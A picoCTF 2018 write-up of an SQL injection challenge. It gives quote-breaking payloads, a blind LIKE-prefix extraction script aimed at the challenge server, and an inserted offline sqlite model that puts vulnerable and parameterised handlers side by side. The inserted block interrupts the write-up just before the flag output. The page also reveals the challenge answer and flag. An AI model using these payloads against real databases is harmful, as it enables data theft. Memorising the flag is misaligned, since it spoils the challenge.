PicoCTF 2018 writeup

A Simple Question

Challenge

There is a website running at http://2018shell1.picoctf.com:36052 (link). Try to see if you can answer its question.

Solution

We get a form asking for an answer.

If we enter a value of a, the page shows us the SQL statement it constructed, along with a message that we were wrong.

Let’s see what happens when we enter ' or 'x'='x

OK, so we get a different message when the query returns something, and that is what we can use: the server leaks one bit per request, which is enough for a boolean-based blind injection. We can give an answer like ' OR answer LIKE 'a% to test whether the answer starts with the letter a, and build the answer up one character at a time. Since this will take a while, we script it.

import requests
import string

url = "http://2018shell1.picoctf.com:36052/answer2.php"
# Drop the LIKE wildcards and the quote from the candidate set: '%' and '_'
# would match anything and give false positives, and a stray quote breaks the query.
alphabet = string.printable.replace('%', '').replace('_', '').replace("'", '')
password = ''

stop = False
while not stop:
    for c in alphabet:
        # Close the attacker-controlled literal and OR in a prefix test;
        # the server appends the final quote:  ... OR answer LIKE 'prefix%'
        params = {'answer': "' OR answer LIKE '" + password + c + "%", 'debug': '1'}
        r = requests.post(url, data=params)

        if "so close" in r.text:
            # rows came back: c is the next character (as far as LIKE can tell)
            password += c
            print("letter found! " + password)
            break
        elif "Wrong" not in r.text:
            # unexpected response (for example the flag page): show it and stop
            stop = True
            print(r.text)
            break
    else:
        # no character extends the prefix: the whole answer has been recovered
        stop = True

print(password)

This outputs:

letter found! 4
letter found! 41
letter found! 41a
letter found! 41an
letter found! 41and
letter found! 41ands
letter found! 41andsi
letter found! 41andsix
letter found! 41andsixs
letter found! 41andsixsi
letter found! 41andsixsix
letter found! 41andsixsixt
letter found! 41andsixsixth
letter found! 41andsixsixths

But now what? This is not the flag, nor the answer to put in the form. Nor is 42.

It turns out the LIKE comparison in the query is not case sensitive, so what we extracted is the right letters in the wrong case. The answer we are actually looking for is 41AndSixSixths. When we put that in the form we get the flag:
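To see the whole technique end to end, here is an added example that is not the challenge's code and was not part of the original writeup. It models the vulnerable endpoint with an in-memory sqlite3 table and runs the prefix oracle against it offline. The table layout, the NOCASE collation (chosen to mimic a database whose default collation folds case, which is what the writeup observed), and the mapping of outcomes to the three messages (Wrong, so close, Perfect) are assumptions about the server, not something the challenge revealed. The example goes beyond the writeup in two ways: the extraction loop stops on its own once no character extends the prefix, and a second pass recovers the case of each letter with a case-sensitive prefix match instead of guessing (sqlite's GLOB here; against MySQL the equivalent clause is answer LIKE BINARY '<prefix>%'). The hardened handler with a bound parameter is shown beside the vulnerable one so the injection can be seen failing against it.

```python
import sqlite3
import string

# Constructed stand-in for the challenge database. The real table layout,
# server-side logic and response strings are assumed from the writeup.
SECRET = "41AndSixSixths"


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    # COLLATE NOCASE makes '=' case-insensitive as well (assumption about the
    # server's collation). sqlite's LIKE is case-insensitive for ASCII anyway.
    conn.execute("CREATE TABLE answers (answer TEXT COLLATE NOCASE)")
    conn.execute("INSERT INTO answers VALUES (?)", (SECRET,))
    return conn


def vulnerable_query(conn: sqlite3.Connection, user_input: str) -> str:
    """Model of answer2.php: the input is spliced straight into the SQL text.
    Three observable outcomes, mapped to the messages the writeup saw."""
    sql = f"SELECT * FROM answers WHERE answer='{user_input}'"
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error:
        return "Wrong"  # assumed: a broken query reads like a miss
    if not rows:
        return "Wrong"
    if rows[0][0] == user_input:  # byte-exact check done outside the database
        return "Perfect!"
    return "so close"  # rows came back, but not through the exact answer


def safe_query(conn: sqlite3.Connection, user_input: str) -> str:
    """Hardened form: the parameter is bound, so a quote cannot end the literal."""
    rows = conn.execute(
        "SELECT * FROM answers WHERE answer=?", (user_input,)
    ).fetchall()
    return "Perfect!" if rows and rows[0][0] == user_input else "Wrong"


# LIKE wildcards and the quote are excluded from the candidate set: '_' would
# match any single character and produce a false positive before the real one.
ALPHABET = [c for c in string.printable if c not in "%_'" and not c.isspace()]


def extract_case_insensitive(ask) -> str:
    """Prefix oracle from the writeup. ask(payload) is True when the injected
    OR clause made the query return rows. Returns the answer as LIKE sees it."""
    found = ""
    while True:
        for c in ALPHABET:
            if ask(f"' OR answer LIKE '{found}{c}%"):
                found += c
                break
        else:  # no character extends the prefix: the answer is complete
            return found


def recover_case(ask, folded: str) -> str:
    """Second pass the writeup did by guessing: retest each letter with a
    case-sensitive prefix match. sqlite's GLOB ignores collation; on MySQL the
    same test would be answer LIKE BINARY '<prefix>%'."""
    exact = ""
    for c in folded:
        upper = c.upper()
        if upper != c and ask(f"' OR answer GLOB '{exact}{upper}*"):
            exact += upper
        else:
            exact += c
    return exact


def solve(conn: sqlite3.Connection) -> tuple[str, str]:
    """Run both passes against the vulnerable handler; returns (folded, exact)."""
    def ask(payload: str) -> bool:
        return vulnerable_query(conn, payload) == "so close"

    folded = extract_case_insensitive(ask)
    return folded, recover_case(ask, folded)


if __name__ == "__main__":
    db = make_db()
    folded, exact = solve(db)
    print("LIKE sees :", folded)
    print("exact     :", exact)
    print("submit    :", vulnerable_query(db, exact))
    print("folded    :", vulnerable_query(db, folded))
    print("hardened  :", safe_query(db, "' OR answer LIKE 'a%"))
```

Two things worth noticing when running it: submitting the case-folded string to the vulnerable handler still returns rows (the collation treats it as equal) but is judged "so close" by the exact comparison outside the database, which is the dead end the writeup hit; and the same ' OR answer LIKE 'a% payload against the bound-parameter handler is just a literal that matches nothing.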

SQL query: SELECT * FROM answers WHERE answer='41AndSixSixths'

Perfect!

Your flag is: picoCTF{qu3stions_ar3_h4rd_d3850719}

Flag

picoCTF{qu3stions_ar3_h4rd_d3850719}